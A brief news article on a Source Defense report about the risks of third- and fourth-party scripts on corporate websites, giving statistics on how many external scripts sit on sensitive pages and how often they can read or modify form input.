A new report from web application protection specialist Source Defense highlights the risk presented by the use of third and fourth party code on corporate websites.
The digital supply chain means that highly dynamic and unpredictable scripts and code from third parties and beyond, permeate every aspect of a business’s web presence. This shadow code has led to some high profile breaches including the British Airways hack in 2018.
The report shows an average of 15 externally generated scripts on each site, with an average of 12 scripts specifically on sensitive pages. Financial services is the most exposed sector, with nearly 60 percent more scripts on average resident on sensitive pages, and double the number per page overall, with triple the amount of fourth-party scripts.
Extensive libraries of third-party scripts are available free, or at low cost, from a range of places and are popular as they allow development teams to quickly add advanced functionality to applications without having to create and maintain them. However, these scripts also often contain code from additional parties further removed from the deploying organization.
The report finds 49 percent of sites analyzed had external code present with the ability to retrieve form input and ‘listen’ to user button clicks, and more than one in five sites had external code with the ability to modify forms.
On average, one in four of all scripts presented fourth-party code, as did every one in five scripts on individual pages. The number was much larger on sensitive pages though, at an average of 12 external scripts in contact with everything from credentials, to account and financial details.
The full report is available from the Source Defense site.